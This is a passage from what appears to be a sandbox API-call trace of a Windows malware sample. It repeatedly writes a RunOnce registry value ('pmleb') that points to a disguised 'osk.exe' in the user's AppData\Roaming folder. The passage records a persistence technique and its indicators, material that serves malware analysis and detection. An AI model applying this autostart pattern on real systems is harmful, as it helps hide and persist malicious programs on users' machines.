[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.176] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0080.177] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.177] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.177] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.177] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.177] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.177] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.177] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.177] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.177] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.177] RegCloseKey (hKey=0x280) returned 0x0 [0080.178] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.178] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.178] SetTimer (hWnd=0x20280, nIDEvent=0x2069, uElapse=0xa, lpTimerFunc=0x0) returned 0x2069 [0080.178] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.189] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.189] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.190] KillTimer (hWnd=0x20280, uIDEvent=0x2069) returned 1 [0080.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.190] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.190] IUnknown:Release (This=0x787518) returned 0x1 [0080.190] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.190] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.190] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.191] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.191] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.191] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0080.191] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.191] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6b [0080.191] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.192] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0080.192] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.192] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.192] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.192] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.192] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.192] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.192] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.193] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.193] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.193] RegCloseKey (hKey=0x280) returned 0x0 [0080.193] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.193] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.193] SetTimer (hWnd=0x20280, nIDEvent=0x206a, uElapse=0xa, lpTimerFunc=0x0) returned 0x206a [0080.193] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.205] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.205] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.205] KillTimer (hWnd=0x20280, uIDEvent=0x206a) returned 1 [0080.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.205] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.206] IUnknown:Release (This=0x787518) returned 0x1 [0080.206] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.206] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.206] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.206] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.206] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0080.207] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.207] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6c [0080.207] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.207] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0080.208] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.208] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.208] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.208] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.208] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.208] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.208] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.208] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.208] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.208] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.209] RegCloseKey (hKey=0x280) returned 0x0 [0080.209] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.209] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.209] SetTimer (hWnd=0x20280, nIDEvent=0x206b, uElapse=0xa, lpTimerFunc=0x0) returned 0x206b [0080.209] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.221] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.221] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.221] KillTimer (hWnd=0x20280, uIDEvent=0x206b) returned 1 [0080.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.221] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.221] IUnknown:Release (This=0x787518) returned 0x1 [0080.221] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.221] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.222] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.222] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.222] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0080.222] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, 